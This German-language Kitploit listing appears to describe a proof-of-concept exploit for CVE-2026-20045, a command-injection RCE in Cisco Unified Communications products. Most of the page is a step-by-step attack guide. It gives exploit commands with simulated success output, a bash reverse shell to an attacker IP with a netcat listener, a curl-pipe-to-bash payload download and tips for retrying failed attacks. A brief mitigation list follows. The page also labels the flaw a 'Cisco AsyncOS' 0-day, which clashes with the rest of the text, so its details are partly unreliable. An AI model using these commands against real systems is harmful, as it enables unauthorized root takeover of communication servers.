Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Ashwesker-CVE-2026-20045 — Proof-of-Concept-Exploit für CVE-2026-20045, eine kritische, nicht authentifizierte RCE in Cisco Unified Communications-Produkten, die Befehlsinjektion und eine Reverse Shell mit Root-Eskalation ermöglicht. | Kitploit
Tools/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

Proof-of-Concept-Exploit für CVE-2026-20045, eine kritische, nicht authentifizierte RCE in Cisco Unified Communications-Produkten, die Befehlsinjektion und eine Reverse Shell mit Root-Eskalation ermöglicht.

Repository anzeigen
635vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2026-20045 — Zero-Day-Analyse 🚨

Cisco AsyncOS 0-Day-Schwachstelle

🧨 Was es ist

Eine kritische Remote-Code-Ausführungs-Schwachstelle (RCE), die mehrere Cisco Unified Communications-Produkte betrifft. Sie wurde aktiv in freier Wildbahn ausgenutzt, bevor Patches veröffentlicht wurden.


🔥 Warum es gefährlich ist

  • 🚫 Keine Authentifizierung erforderlich
  • 🖥️ Remote-Code-Ausführung
  • 👑 Potentieller Root-Zugriff
  • 🌍 Bestätigte Ausnutzung in der Praxis

Das bedeutet, dass ein Angreifer betroffene Systeme vollständig remote übernehmen könnte.


🚨 Verwendungsbeispiele für CVE-2026-20045.py

Hier ist eine übersichtliche Anleitung mit Verwendungsbeispielen zum Ausführen des PoC-Skripts, einschließlich genau dem, was Sie sehen würden, wenn der Exploit auf einem verwundbaren Cisco-Unified-Communications-Ziel erfolgreich ist (ungepatchte Weboberfläche exponiert). Ich habe etwas Ästhetik mit Emojis, farbigen Codeblöcken (via Markdown) und strukturierten Abschnitten für bessere Lesbarkeit hinzugefügt. 😎

1. Grundlegender Systeminfo-Test

Dies führt einfache Befehle aus, um Benutzer-ID, Benutzername und Systemdetails abzurufen.

Befehl:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

Was Sie sehen würden, wenn es funktioniert (Erfolgreiche Ausgabe):

root@kitploit:~
[*] Sende Stage-1-Injektion an: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Anfangsbefehl: id && whoami && uname -a  
[+] Stage 1 wahrscheinlich erfolgreich! Status: 200  
[*] Sende Stage-2-Eskalation an: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (Root-Eskalation) wahrscheinlich erfolgreich! Status: 200  

[+] Mögliche Befehlsausgabe:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 Wichtige Anzeichen: Grüne [+]-Indikatoren, HTTP-200-Status und Befehlsergebnisse im Ausgabeblock. Wenn keine Ausgabe angezeigt wird, aber der Status 200 ist, hat es trotzdem still funktioniert!

2. Reverse-Shell-Einrichtung

Dies erzeugt eine interaktive Shell zurück zu Ihrem Rechner. Starten Sie zuerst einen Listener: nc -lvnp 4444.

Befehl:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

Was Sie sehen würden, wenn es funktioniert (Im Skript-Terminal):

root@kitploit:~
[*] Sende Stage-1-Injektion an: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Anfangsbefehl: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 wahrscheinlich erfolgreich! Status: 200  
[*] Sende Stage-2-Eskalation an: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (Root-Eskalation) wahrscheinlich erfolgreich! Status: 200  
[+] Befehl still ausgeführt (Ziel auf Auswirkungen prüfen)  

Was Sie im Listener-Terminal (nc) sehen würden:

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 Wichtige Anzeichen: Skript zeigt Erfolgsmeldungen; Listener erhält sofort eine Root-Shell-Eingabeaufforderung. Geben Sie dort Befehle ein, um zu interagieren!

3. Datei-Download & Ausführung (z. B. Benutzerdefiniertes Payload)

Dies lädt ein Skript von Ihrem Server herunter und führt es aus.

Befehl:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

Was Sie sehen würden, wenn es funktioniert (Erfolgreiche Ausgabe):

root@kitploit:~
[*] Sende Stage-1-Injektion an: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Anfangsbefehl: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 wahrscheinlich erfolgreich! Status: 200  
[*] Sende Stage-2-Eskalation an: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (Root-Eskalation) wahrscheinlich erfolgreich! Status: 200  
[+] Befehl still ausgeführt (Ziel auf Auswirkungen prüfen)  

📥 Wichtige Anzeichen: 200-Statuscodes; auf dem Ziel verifizieren (z. B. Protokolle/Dateien prüfen) oder auf Ihrem Server (Download-Protokolle). Keine direkte Ausgabe, wenn das Payload still ist.

💡 Profi-Tipps:

  • Führen Sie bei Bedarf mit sudo aus, um Netzwerkprivilegien zu erhalten.
  • Verwenden Sie HTTPS-Ziele; das Skript behandelt selbstsignierte Zertifikate.
  • Wenn es fehlschlägt (z. B. 404/403), versuchen Sie andere Pfade oder prüfen Sie, ob das Ziel gepatcht ist.
  • Testen Sie immer ethisch! 😈

🧩 Betroffene Produkte

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 Grundursache

Unzureichende Validierung von benutzereingegebenen Daten in HTTP-Verwaltungsschnittstellen, was Befehlsinjektion ermöglicht, die zu Remote-Code-Ausführung führt.


📊 Schweregrad

  • CVSS-Score: 8.2 (Hoch)
  • Geschäftsauswirkung: Kritisch

🛡️ Minderung & Verteidigung

  • ⚡ Cisco-Patches sofort anwenden
  • 🔒 Zugriff auf Verwaltungsschnittstellen einschränken
  • 🌐 Systeme nicht direkt dem Internet aussetzen
  • 👀 Protokolle auf verdächtige HTTP-Aktivitäten überwachen
  • 🏛️ Gegebenenfalls behördliche Richtlinien zur Schwachstellenbehebung befolgen

🔒 Haftungsausschluss:

Der gesamte PoC-Code dient nur ethischen, pädagogischen Zwecken auf autorisierten Systemen. Unautorisierte Ausnutzung ist illegal; es wird keine Haftung für Missbrauch übernommen. 😈

Tool herunterladen